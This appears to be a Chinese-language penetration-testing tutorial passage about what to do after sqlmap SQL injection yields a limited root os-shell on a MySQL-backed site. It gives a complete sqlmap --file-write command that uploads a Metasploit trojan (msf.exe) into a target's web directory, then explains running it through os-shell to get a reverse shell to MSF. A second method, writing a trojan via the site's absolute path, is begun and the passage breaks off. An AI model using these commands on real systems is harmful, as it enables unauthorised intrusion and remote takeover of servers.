利用场景：当前是 root 用户，且通过 --os-shell 可以执行一部分少数的命令，很多命令没有回显，也不能执行powershell命令反弹木马。

方法一：直接写入木马，执行

由于通过SQLmap注入MySQL类型的网站，--os-shell 参数无法执行远程下载的命令，所以我们可以本地写入木马文件。

sqlmap -u "http://192.168.10.20:88/index.php?id=1" -p id --dbms="MySQL" --batch --file-write msf.exe --file-dest "C:\phpstudy\WWW\msf.exe"

然后通过os-shell直接执行该msf.exe木马文件，我们的MSF就可以收到shell了。

方法二：找到网站绝对路径，写入木马

如果第一种方法不能执行木马文件或者执行完之后我们收不到shell。这种情况的话，就必须得找到网站绝对路径写入木马了。